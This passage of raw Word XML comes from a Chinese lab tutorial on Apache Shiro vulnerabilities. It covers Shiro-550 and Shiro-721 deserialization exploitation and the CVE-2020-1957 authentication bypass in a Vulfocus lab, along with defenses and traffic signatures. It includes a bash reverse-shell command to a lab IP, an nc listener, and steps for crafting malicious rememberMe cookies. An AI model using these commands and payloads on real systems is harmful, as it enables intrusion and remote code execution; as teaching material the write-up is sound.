        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>时会告警。就可以得到shiro的AES密钥。（需要多刷新几次）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9A0CCF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202FD11C" wp14:editId="6575DA83">
            <wp:extent cx="5975985" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="13335" b="0"/>
            <wp:docPr id="1390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图片 72"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:srcRect t="9336" b="12392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A465B" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl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使用EXP插件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shiro attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：提取秘钥，生成payload，生成cookie，发送payload都能完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499CCE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直接输入网址就可以爆破出目标shiro框架的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>密钥。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B577EF6" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E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754CCE65" wp14:editId="1E96EDBB">
            <wp:extent cx="5970905" cy="1950720"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1393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" name="图片 75"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect t="15410" b="13659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5533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点击爆破利用链及回显，生成payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690730FC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1F2AEE49" wp14:editId="4D0427B5">
            <wp:extent cx="5970905" cy="1393825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1394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图片 76"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect t="49331" b="5985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F1ADF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还可以执行指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E6C95C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337425A5" wp14:editId="09D4EB15">
            <wp:extent cx="5975985" cy="1332865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1395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" name="图片 77"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect t="20519" b="25630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9AE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还可以通过此工具直接进行漏洞利用来反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8F3B0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在PCKail2023虚拟机开启nc监听：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>nc -lvnp 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D87FF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使用工具，点爆破利用链及回显</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B118D1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484B4AB0" wp14:editId="0B7D1569">
            <wp:extent cx="5970905" cy="1405890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1397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" name="图片 79"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect t="48566" b="6066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1E2B6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执行反弹shell指令：bash -c 'exec bash -i &amp;&gt;/dev/tcp/192.168.1.11/2023 &lt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553369AF" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="58AB1DF5" wp14:editId="37A91E6A">
            <wp:extent cx="5970905" cy="1532890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1400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图片 82"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:srcRect t="48108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4B4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监听kail主机成功拿到shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D76B96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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6E009D40" wp14:editId="289D8ACD">
            <wp:extent cx="5974715" cy="883285"/>
            <wp:effectExtent l="0" t="0" r="14605" b="635"/>
            <wp:docPr id="1399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图片 81"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:srcRect b="16955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7568B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 w:line="0" w:lineRule="atLeast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⑩防御shiro漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD018D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升级shiro版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C55E42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限制cookie长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F2D6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不要使用硬编码的key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151D6B7D" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B14E30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 xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Shiro721</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/Shiro反序列化漏洞CVE-2019-12422</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41114E9F" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3EE29956" wp14:editId="1621614B">
            <wp:extent cx="6027420" cy="655320"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="5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F2AB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 w:line="0" w:lineRule="atLeast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①漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C759D8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Shiro 721用的是AES-CBC加密方式来保护RememberMe功能中的cookie。这种加密方法的密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE977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钥是系统随机生成的，基本上无法猜到。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>攻击者可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>登陆后的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">有效的RememberMe Cookie作为 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F96CFD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Padding Oracle Attack 的前缀，然后构造 RememberMe Cookie 来实施反序列化攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B0F3F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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Shiro &lt; 1.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C9B7A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这里Oracle不是数据库，是一种通过接收特定加密数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解密并验证填充是否正确的方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F359978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 w:line="0" w:lineRule="atLeast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②与shiro550区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464D7E10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加密的方式不一样。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EA1431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Shiro550用的已知默认密钥，只要有足够密钥库（条件较低），不需要Remember Cookie。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20155041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Shiro721使用的是AES-CBC加密方式，密钥是系统随机生成的，基本猜不到，可使用登录后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB486C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有效的rememberMe值去爆破正确的key值，利用有效的RememberMe Cookie作为Padding Oracle </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A3973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Attack的前缀，然后构造 RememberMe Cookie 值来实现反序列化漏洞攻击，难度高。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EC52C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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>攻击流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F30483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1. 使用任意有效的账户登录目标网站，以获取一个合法的RememberMe Cookie。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4EB77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2. 使用合法的RememberMe Cookie作为POA(Padding Oracle Attack)的前缀生成payload。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E0986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3. 加密反序列化payload并构造一个恶意的RememberMe Cookie。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43C19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4. 将构造的恶意payload填充到RememberMe Cookie字段中，并发送给服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0167C39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必要条件：为进行上述操作，必须先拥有一个合法RememberMe Cookie，需至少成功登录一次。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C613C7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 w:line="0" w:lineRule="atLeast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③复现利用流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF1701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用Vulfocus靶场的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shiro-72</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1来复现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7265190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登录靶场搜索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shiro-72</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1漏洞并下载--&gt;首页——&gt;启动镜像——&gt;访问指定的网址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7EA5EC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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="199E470D" wp14:editId="6818782A">
            <wp:extent cx="5975985" cy="1895475"/>
            <wp:effectExtent l="0" t="0" r="13335" b="9525"/>
            <wp:docPr id="1409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" name="图片 91"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:srcRect t="19973" b="4842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00A01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访问镜像信息上的网址：漏洞环境启动成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C95D6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0DC6D72D" wp14:editId="20398CC0">
            <wp:extent cx="5974080" cy="1288415"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1410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图片 92"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:srcRect b="44762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2BE7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开始复现漏洞（复现极其麻烦，看一遍过程即可）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA0BBF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shiro721也可以使用shiro attack 2.2工具，速度快，推荐使用这个。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1801552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使用给到的一个正确账号和密码(勾选Remember Me)来登录抓包，获取合法cookie。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062CD745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5AD96C74" wp14:editId="62227BA6">
            <wp:extent cx="5975350" cy="2766695"/>
            <wp:effectExtent l="0" t="0" r="13970" b="6985"/>
            <wp:docPr id="1411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" name="图片 9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B2F96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登录抓包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6D45D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如果登录认证失败，只能得到 rememberMe=deleteMe这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471D135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响应回来看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>remeberMe=dkE.....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这是正确的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，一会要用到它。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C95F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成功获取了合法cookie信息然后丢弃——取消拦截</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639169D6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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5FEE8384" wp14:editId="5C385497">
            <wp:extent cx="5968365" cy="1943735"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6985"/>
            <wp:docPr id="1412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图片 94"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:srcRect t="9476" b="1553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196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使用Java反序列化工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ysoserial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.class类：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A268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获取一个DNSlog网址来添加到payload里执行：50wp58.dnslog.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8561F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用Kail虚拟机使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ysoserial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.jar工具--&gt;执行指令生成payload：生成一个payload.class类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0BEE7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这里用了一个dnslog.cn来看一下指令执行效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC7110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7812056F" wp14:editId="666778B2">
            <wp:extent cx="5975350" cy="2175510"/>
            <wp:effectExtent l="0" t="0" r="13970" b="3810"/>
            <wp:docPr id="1414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图片 9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51A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再通过Padding Oracle Attack生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Evil Rememberme cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A1CF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需要使用暴破AES密钥的脚本：Shiro-exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B599B5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39D658CC" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">注意：此exp爆破时间较长，约 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>个多小时可生成正确的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rememberme cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F194BB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使用Shiro-exp爆破密匙：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>此指令要执行一个多小时，不推荐使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387BBCB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构造恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rememberme cookie认证进行反序列化攻击--&gt;DNSlog接收到记录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E03D30E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④流量特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C4B5B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rememberme字段长度异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7C5AF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请求包Cookie的rememberMe中会存在AES+base64加密的一串java反序列化代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B9963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返回包中存在base64加密数据，该数据可作为攻击成功的判定条件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC4541B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1.3 Shiro认证绕过漏洞（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2020-1957）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DB7C61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①漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343F76A5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漏洞的原理主要涉及Shiro对客户端请求URL路径的处理方式。在Apache Shiro 1.5.2版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B776E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之前，如果shiro框架用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>动态控制器，因为shiro对URL的处理和SpringBoot对URL的处</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76584E8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理方式有所不同，导致攻击者可以构造..;来制造跳转，然后绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Shiro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中对目录限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9AB79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37C4194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lastRenderedPageBreak/>
        <w:t>Shiro处理URL：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B585D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Shiro会截断URI，清除分号及其后的所有内容，只返回分号前的URI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4349ED3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SpringBoot处理URL：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061EDD9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Spring会先找到分号位置，检查分号后有没有/，有就记录/位置，并将分号前的数据与/后的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69284FB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数据拼接，最后返回处理后的requestURI。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A87C3A0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由于Spring和Shiro在 decodeAndCleanUriString 方法上的处理方式不同，攻击者可以利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568B34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分号来构造路径，绕过Shiro的认证，并能够匹配到Spring的动态控制器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB2A90C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②漏洞产生流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0C0DA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在使用了shiro框架时，是请求的URL(URL1),经过shiro权限检验(URL2),最后到springboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327550E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项目找到路由来处理(URL3)，漏洞的出现就在URL1,URL2和URL3、有可能不是同一个URL，就导致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AEA54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能绕过shiro的校验，直接访问后端需要首选的URL。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C08A24A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③URL配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1246BB8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Shiro框架通过使用anon和authc等拦截器来控制用户的访问权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E94672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anon拦截器允许匿名访问，常用于静态资源。authc拦截器则要求用户登录后才能访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E45555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URL路径表达式通常采用ANT格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E7200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以下是一个示例配置，展示了如何配置URL权限：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C576D3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@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6C7045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public ShiroFilterChainDefinition shiroFilterChainDefinition() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1BC4F6" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
